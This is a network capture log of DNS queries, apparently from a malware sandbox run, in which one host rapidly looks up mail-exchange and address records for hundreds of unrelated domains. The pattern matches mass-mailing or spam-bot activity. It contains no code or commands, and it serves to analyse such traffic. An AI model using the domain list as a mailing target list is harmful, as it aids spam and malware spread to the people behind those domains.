Feb 21, 2024 00:26:01.200406075 CET	192.168.2.6	1.1.1.1	0xb08d	Standard query (0)	dancenight-express.de	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.201514959 CET	192.168.2.6	1.1.1.1	0xc316	Standard query (0)	protonmail.de	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.202168941 CET	192.168.2.6	1.1.1.1	0x2f58	Standard query (0)	sq-community.com	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.202622890 CET	192.168.2.6	1.1.1.1	0x6a29	Standard query (0)	cdgcapitalbourse.ma	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.203532934 CET	192.168.2.6	1.1.1.1	0xba31	Standard query (0)	lavera2.de	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.203953028 CET	192.168.2.6	1.1.1.1	0xfcaf	Standard query (0)	farma-aps.com	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.205558062 CET	192.168.2.6	1.1.1.1	0x5312	Standard query (0)	gamma.ocm.ne.jp	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.206093073 CET	192.168.2.6	1.1.1.1	0x1873	Standard query (0)	art-paix-di.org	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.206640005 CET	192.168.2.6	1.1.1.1	0xdc1	Standard query (0)	zube-hotmail.de	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.207192898 CET	192.168.2.6	1.1.1.1	0xc6ad	Standard query (0)	popular.de	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.207902908 CET	192.168.2.6	1.1.1.1	0x9cc1	Standard query (0)	imao.ml	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.208327055 CET	192.168.2.6	1.1.1.1	0x5b81	Standard query (0)	caspiantravel.co.uk	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.208851099 CET	192.168.2.6	1.1.1.1	0xd402	Standard query (0)	x-erfolgsteam.de	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.209233999 CET	192.168.2.6	1.1.1.1	0x8e3a	Standard query (0)	undercover-bietigheim.de	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.209754944 CET	192.168.2.6	1.1.1.1	0xfff1	Standard query (0)	29hotmail.de	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.210122108 CET	192.168.2.6	1.1.1.1	0xefe1	Standard query (0)	imailzone.com	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.210469961 CET	192.168.2.6	1.1.1.1	0xb45f	Standard query (0)	collevilca.it	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.210834026 CET	192.168.2.6	1.1.1.1	0x481b	Standard query (0)	network-abilities.com	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.211510897 CET	192.168.2.6	1.1.1.1	0x8973	Standard query (0)	sportclinic.co.il	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.211813927 CET	192.168.2.6	1.1.1.1	0x54d2	Standard query (0)	spd-hotmail.de	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.212173939 CET	192.168.2.6	1.1.1.1	0xcce6	Standard query (0)	wilsonfamilyinsurance.com	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.213326931 CET	192.168.2.6	1.1.1.1	0x501c	Standard query (0)	publichouse.ie	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.213994980 CET	192.168.2.6	1.1.1.1	0x2484	Standard query (0)	morr-hotmail.de	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.214525938 CET	192.168.2.6	1.1.1.1	0xd66c	Standard query (0)	veselcontractors.com	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:02.304193974 CET	192.168.2.6	1.1.1.1	0x46aa	Standard query (0)	jtirit.com	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:02.386049986 CET	192.168.2.6	1.1.1.1	0x6221	Standard query (0)	joaz.de	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:02.387742996 CET	192.168.2.6	1.1.1.1	0x613c	Standard query (0)	smhotmaillang.de	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:02.406506062 CET	192.168.2.6	1.1.1.1	0xdb3c	Standard query (0)	fos-elektronik.de	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:02.413398981 CET	192.168.2.6	1.1.1.1	0x665e	Standard query (0)	shinko-kensetsu.co.jp	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:02.413398981 CET	192.168.2.6	1.1.1.1	0x52ca	Standard query (0)	att.co.id	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:02.413516045 CET	192.168.2.6	1.1.1.1	0x8432	Standard query (0)	breecetechnology.co.za	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:02.413549900 CET	192.168.2.6	1.1.1.1	0xeaf8	Standard query (0)	outlook.fr.sg	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:02.413770914 CET	192.168.2.6	1.1.1.1	0x3aba	Standard query (0)	architettosangiorgio.ch	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:02.414057970 CET	192.168.2.6	1.1.1.1	0xb63b	Standard query (0)	m-viper.de	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:02.414057970 CET	192.168.2.6	1.1.1.1	0x6bfb	Standard query (0)	aregods.com	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:02.414248943 CET	192.168.2.6	1.1.1.1	0x3192	Standard query (0)	att.com.au	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:02.414658070 CET	192.168.2.6	1.1.1.1	0x3a88	Standard query (0)	ptotonmail.ch	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:02.414658070 CET	192.168.2.6	1.1.1.1	0x6262	Standard query (0)	gothic-concerts.de	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:02.416174889 CET	192.168.2.6	1.1.1.1	0xf7a6	Standard query (0)	gmcocorp.com	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:02.416412115 CET	192.168.2.6	1.1.1.1	0xc77b	Standard query (0)	netzschnipsel.de	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:02.675870895 CET	192.168.2.6	1.1.1.1	0x9850	Standard query (0)	blauthlaw.com	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:02.675872087 CET	192.168.2.6	1.1.1.1	0xc64f	Standard query (0)	temxp.net	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:02.678448915 CET	192.168.2.6	1.1.1.1	0xe21a	Standard query (0)	stylesense.co.uk	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:02.678519011 CET	192.168.2.6	1.1.1.1	0x392a	Standard query (0)	strategicimpact.com.au	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:02.678942919 CET	192.168.2.6	1.1.1.1	0x5be9	Standard query (0)	pharmacie-vp.fr	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:02.679641008 CET	192.168.2.6	1.1.1.1	0x80d	Standard query (0)	att.in	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:02.679641008 CET	192.168.2.6	1.1.1.1	0x17db	Standard query (0)	homehotmail.de	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:02.997776031 CET	192.168.2.6	1.1.1.1	0x7bb0	Standard query (0)	wild-east.de	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:02.997776985 CET	192.168.2.6	1.1.1.1	0x8526	Standard query (0)	heinzerlinghotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:02.998326063 CET	192.168.2.6	1.1.1.1	0xc666	Standard query (0)	rubypink.co.uk	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.003253937 CET	192.168.2.6	1.1.1.1	0x8f1a	Standard query (0)	hotmailhome.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.003904104 CET	192.168.2.6	1.1.1.1	0xd603	Standard query (0)	hotmail.fr.br	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.006314039 CET	192.168.2.6	1.1.1.1	0xb9bf	Standard query (0)	glazing-bt.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.008459091 CET	192.168.2.6	1.1.1.1	0x36a8	Standard query (0)	derbyron.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.008459091 CET	192.168.2.6	1.1.1.1	0xdc05	Standard query (0)	att.com.tw	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.012790918 CET	192.168.2.6	1.1.1.1	0x442b	Standard query (0)	hotmail.fr.au	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.012790918 CET	192.168.2.6	1.1.1.1	0xafe3	Standard query (0)	mhcosta.gotadsl.co.uk	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.014702082 CET	192.168.2.6	1.1.1.1	0xf697	Standard query (0)	mlbx.matrix.jp	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.017075062 CET	192.168.2.6	1.1.1.1	0x7a9	Standard query (0)	jtirit.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.017075062 CET	192.168.2.6	1.1.1.1	0x90a0	Standard query (0)	fos-elektronik.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.019484043 CET	192.168.2.6	1.1.1.1	0x26b8	Standard query (0)	voltage-distribution.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.021873951 CET	192.168.2.6	1.1.1.1	0x750a	Standard query (0)	scw-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.021873951 CET	192.168.2.6	1.1.1.1	0xb8f1	Standard query (0)	wefttechnologies.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.024693966 CET	192.168.2.6	1.1.1.1	0x552	Standard query (0)	hotmail.fr.tr	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.024693966 CET	192.168.2.6	1.1.1.1	0x57d9	Standard query (0)	d-brinkmann.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.027939081 CET	192.168.2.6	1.1.1.1	0x3c94	Standard query (0)	cfca.eu	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.027939081 CET	192.168.2.6	1.1.1.1	0xf498	Standard query (0)	breecetechnology.co.za	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.029699087 CET	192.168.2.6	1.1.1.1	0xb1ee	Standard query (0)	iisalessandrini.it	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.030941963 CET	192.168.2.6	1.1.1.1	0x6f4c	Standard query (0)	schupp-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.031500101 CET	192.168.2.6	1.1.1.1	0x8f80	Standard query (0)	kvapilova.net	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.032562017 CET	192.168.2.6	1.1.1.1	0x21ab	Standard query (0)	igs-ruelzheim.rp.lo-net2.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.033956051 CET	192.168.2.6	1.1.1.1	0x4008	Standard query (0)	generika-apotheke-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.033956051 CET	192.168.2.6	1.1.1.1	0x4f23	Standard query (0)	joaz.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.035557985 CET	192.168.2.6	1.1.1.1	0xd69f	Standard query (0)	b4l-clan.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.035558939 CET	192.168.2.6	1.1.1.1	0xf563	Standard query (0)	esafrica.co.zw	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.036626101 CET	192.168.2.6	1.1.1.1	0x921b	Standard query (0)	att.com.sg	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.038297892 CET	192.168.2.6	1.1.1.1	0xafc	Standard query (0)	architettosangiorgio.ch	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.038749933 CET	192.168.2.6	1.1.1.1	0x3626	Standard query (0)	creativ-moebelwerkstaetten.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.042234898 CET	192.168.2.6	1.1.1.1	0xeee6	Standard query (0)	farma-aps.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.042236090 CET	192.168.2.6	1.1.1.1	0xa2	Standard query (0)	lavera2.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.043814898 CET	192.168.2.6	1.1.1.1	0xc72b	Standard query (0)	m-viper.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.043814898 CET	192.168.2.6	1.1.1.1	0x411d	Standard query (0)	dancenight-express.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.045614958 CET	192.168.2.6	1.1.1.1	0xd9a0	Standard query (0)	acidvision.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.045614958 CET	192.168.2.6	1.1.1.1	0x2b19	Standard query (0)	att.com.hk	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.045963049 CET	192.168.2.6	1.1.1.1	0x9019	Standard query (0)	runyai-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.046325922 CET	192.168.2.6	1.1.1.1	0x8c3f	Standard query (0)	tux4hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.046628952 CET	192.168.2.6	1.1.1.1	0xba54	Standard query (0)	shinko-kensetsu.co.jp	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.046895027 CET	192.168.2.6	1.1.1.1	0xfcb9	Standard query (0)	hotmail.fryahoo.fr	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.046895027 CET	192.168.2.6	1.1.1.1	0x97da	Standard query (0)	mwpmedia.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.047101974 CET	192.168.2.6	1.1.1.1	0x75b0	Standard query (0)	utlohotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.047533035 CET	192.168.2.6	1.1.1.1	0xd92a	Standard query (0)	amsantechnology.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.047533035 CET	192.168.2.6	1.1.1.1	0xca6f	Standard query (0)	fortressrealcapital.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.048449993 CET	192.168.2.6	1.1.1.1	0xd0bb	Standard query (0)	newhotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.048449993 CET	192.168.2.6	1.1.1.1	0x95f4	Standard query (0)	waukesha-water.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.048724890 CET	192.168.2.6	1.1.1.1	0x3593	Standard query (0)	ksv-schwimmen.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.049016953 CET	192.168.2.6	1.1.1.1	0xf497	Standard query (0)	hotmail-topmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.049547911 CET	192.168.2.6	1.1.1.1	0x9112	Standard query (0)	schussundtor.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.049547911 CET	192.168.2.6	1.1.1.1	0xd3e4	Standard query (0)	radiussystemllc.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.049779892 CET	192.168.2.6	1.1.1.1	0x6a4a	Standard query (0)	att.co.id	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.050337076 CET	192.168.2.6	1.1.1.1	0x259c	Standard query (0)	eyegage.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.051604986 CET	192.168.2.6	1.1.1.1	0xf399	Standard query (0)	hotmail.fr.ar	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.051605940 CET	192.168.2.6	1.1.1.1	0xb336	Standard query (0)	markoren.no	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.052304983 CET	192.168.2.6	1.1.1.1	0xacff	Standard query (0)	hotmailjoy.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.052304983 CET	192.168.2.6	1.1.1.1	0xed97	Standard query (0)	touktoukcie.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.052792072 CET	192.168.2.6	1.1.1.1	0xa98a	Standard query (0)	hotmail.demail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.053380013 CET	192.168.2.6	1.1.1.1	0x3604	Standard query (0)	cpsgroupe.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.053591013 CET	192.168.2.6	1.1.1.1	0x7490	Standard query (0)	outlook.fr.sg	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.054162025 CET	192.168.2.6	1.1.1.1	0x50f5	Standard query (0)	att.com.ph	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.054162025 CET	192.168.2.6	1.1.1.1	0x1c7b	Standard query (0)	terminatour-bohotmailing.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.054492950 CET	192.168.2.6	1.1.1.1	0xf04	Standard query (0)	aregods.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.054944992 CET	192.168.2.6	1.1.1.1	0x3627	Standard query (0)	smhotmaillang.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.054945946 CET	192.168.2.6	1.1.1.1	0xd399	Standard query (0)	att.no	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.055360079 CET	192.168.2.6	1.1.1.1	0x108a	Standard query (0)	att.no	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:03.055690050 CET	192.168.2.6	1.1.1.1	0xaca9	Standard query (0)	runyai-hotmail.de	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:03.055690050 CET	192.168.2.6	1.1.1.1	0xf089	Standard query (0)	popular.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.056071043 CET	192.168.2.6	1.1.1.1	0xd4f3	Standard query (0)	art-paix-di.org	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.056071043 CET	192.168.2.6	1.1.1.1	0xaf1b	Standard query (0)	zube-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.056312084 CET	192.168.2.6	1.1.1.1	0x24df	Standard query (0)	gamma.ocm.ne.jp	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.056978941 CET	192.168.2.6	1.1.1.1	0x3dbd	Standard query (0)	x-erfolgsteam.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.056978941 CET	192.168.2.6	1.1.1.1	0x43c5	Standard query (0)	ptotonmail.ch	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.057238102 CET	192.168.2.6	1.1.1.1	0xb15d	Standard query (0)	caspiantravel.co.uk	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.057442904 CET	192.168.2.6	1.1.1.1	0x3387	Standard query (0)	imao.ml	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.057933092 CET	192.168.2.6	1.1.1.1	0x62e4	Standard query (0)	undercover-bietigheim.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.058825970 CET	192.168.2.6	1.1.1.1	0xdd10	Standard query (0)	imailzone.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.058826923 CET	192.168.2.6	1.1.1.1	0x8220	Standard query (0)	29hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.059140921 CET	192.168.2.6	1.1.1.1	0xe2b4	Standard query (0)	collevilca.it	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.059230089 CET	192.168.2.6	1.1.1.1	0x9e73	Standard query (0)	gmcocorp.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.059389114 CET	192.168.2.6	1.1.1.1	0x17a2	Standard query (0)	gothic-concerts.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.059586048 CET	192.168.2.6	1.1.1.1	0x8432	Standard query (0)	netzschnipsel.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.061959982 CET	192.168.2.6	1.1.1.1	0x5729	Standard query (0)	network-abilities.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.061959982 CET	192.168.2.6	1.1.1.1	0xfb10	Standard query (0)	sportclinic.co.il	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.062335014 CET	192.168.2.6	1.1.1.1	0x225d	Standard query (0)	spd-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.062716961 CET	192.168.2.6	1.1.1.1	0x1bcf	Standard query (0)	wilsonfamilyinsurance.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.062716961 CET	192.168.2.6	1.1.1.1	0xddda	Standard query (0)	morr-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.063034058 CET	192.168.2.6	1.1.1.1	0xbfa5	Standard query (0)	publichouse.ie	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.063034058 CET	192.168.2.6	1.1.1.1	0xdcfa	Standard query (0)	veselcontractors.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.063301086 CET	192.168.2.6	1.1.1.1	0x9668	Standard query (0)	houseguru.com.au	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.064974070 CET	192.168.2.6	1.1.1.1	0x8cb1	Standard query (0)	cabinet-orsika.fr	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.064975023 CET	192.168.2.6	1.1.1.1	0xccbb	Standard query (0)	montessorihawaii.org	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.065227985 CET	192.168.2.6	1.1.1.1	0xd6ec	Standard query (0)	temxp.net	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.065596104 CET	192.168.2.6	1.1.1.1	0xeb41	Standard query (0)	archononline.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.065596104 CET	192.168.2.6	1.1.1.1	0x9791	Standard query (0)	upblue.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.066104889 CET	192.168.2.6	1.1.1.1	0xb500	Standard query (0)	hoenighotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.066270113 CET	192.168.2.6	1.1.1.1	0x650b	Standard query (0)	blauthlaw.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.066684008 CET	192.168.2.6	1.1.1.1	0x1759	Standard query (0)	norwegischlernen.info	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.066684008 CET	192.168.2.6	1.1.1.1	0x956b	Standard query (0)	stylesense.co.uk	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.067641973 CET	192.168.2.6	1.1.1.1	0xdd79	Standard query (0)	protonmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.067641973 CET	192.168.2.6	1.1.1.1	0x6438	Standard query (0)	sq-community.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.068600893 CET	192.168.2.6	1.1.1.1	0x16ca	Standard query (0)	cdgcapitalbourse.ma	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.068600893 CET	192.168.2.6	1.1.1.1	0xf133	Standard query (0)	cfgteam.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.069003105 CET	192.168.2.6	1.1.1.1	0x6fb	Standard query (0)	oulohotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.069003105 CET	192.168.2.6	1.1.1.1	0x288c	Standard query (0)	jalds.org	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.069288015 CET	192.168.2.6	1.1.1.1	0x89	Standard query (0)	eskimo.ch	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.069456100 CET	192.168.2.6	1.1.1.1	0x22b7	Standard query (0)	wild-east.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.070331097 CET	192.168.2.6	1.1.1.1	0x1db3	Standard query (0)	braekling.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.070331097 CET	192.168.2.6	1.1.1.1	0x3c69	Standard query (0)	strategicimpact.com.au	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.070679903 CET	192.168.2.6	1.1.1.1	0x3a0a	Standard query (0)	homehotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.071048021 CET	192.168.2.6	1.1.1.1	0x23b8	Standard query (0)	ufer-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.071377039 CET	192.168.2.6	1.1.1.1	0xc9fd	Standard query (0)	pharmacie-vp.fr	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.071377039 CET	192.168.2.6	1.1.1.1	0x639	Standard query (0)	att.in	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.157150984 CET	192.168.2.6	1.1.1.1	0xb83e	Standard query (0)	mail.touktoukcie.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.157314062 CET	192.168.2.6	1.1.1.1	0xf0de	Standard query (0)	aspmx3.googlemail.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.157876968 CET	192.168.2.6	1.1.1.1	0x4895	Standard query (0)	smtp.google.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.160593987 CET	192.168.2.6	1.1.1.1	0x7cb7	Standard query (0)	mail.wilsonfamilyinsurance.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.162025928 CET	192.168.2.6	1.1.1.1	0xc7dd	Standard query (0)	markoren-no.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.162026882 CET	192.168.2.6	1.1.1.1	0x62ab	Standard query (0)	smtpin.rzone.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.162292004 CET	192.168.2.6	1.1.1.1	0x1fe4	Standard query (0)	mx.alice-dsl.net	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.162693024 CET	192.168.2.6	1.1.1.1	0x1666	Standard query (0)	glazingbt-com01i.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.614861965 CET	192.168.2.6	1.1.1.1	0x52ca	Standard query (0)	att.co.id	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:03.644491911 CET	192.168.2.6	1.1.1.1	0x1372	Standard query (0)	norwegischlernen.info	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:03.645128012 CET	192.168.2.6	1.1.1.1	0xc2e5	Standard query (0)	hoenighotmail.de	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:03.645401001 CET	192.168.2.6	1.1.1.1	0xa31f	Standard query (0)	archononline.com	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:03.649251938 CET	192.168.2.6	1.1.1.1	0x35ea	Standard query (0)	upblue.de	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:04.231941938 CET	192.168.2.6	1.1.1.1	0xcd4d	Standard query (0)	montessorihawaii.org	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:04.232851982 CET	192.168.2.6	1.1.1.1	0xb5c9	Standard query (0)	oulohotmail.de	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:04.242183924 CET	192.168.2.6	1.1.1.1	0xf498	Standard query (0)	breecetechnology.co.za	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.242263079 CET	192.168.2.6	1.1.1.1	0x6a4a	Standard query (0)	att.co.id	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.242300034 CET	192.168.2.6	1.1.1.1	0x2b19	Standard query (0)	att.com.hk	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.242325068 CET	192.168.2.6	1.1.1.1	0x9668	Standard query (0)	houseguru.com.au	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:04.242728949 CET	192.168.2.6	1.1.1.1	0x8f7	Standard query (0)	ufer-hotmail.de	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:04.243057013 CET	192.168.2.6	1.1.1.1	0x55b8	Standard query (0)	houseguru.com.au	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:04.243323088 CET	192.168.2.6	1.1.1.1	0xe326	Standard query (0)	eskimo.ch	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:04.244363070 CET	192.168.2.6	1.1.1.1	0xae24	Standard query (0)	jalds.org	MX (Mail exchange)	IN (0x0001)	false
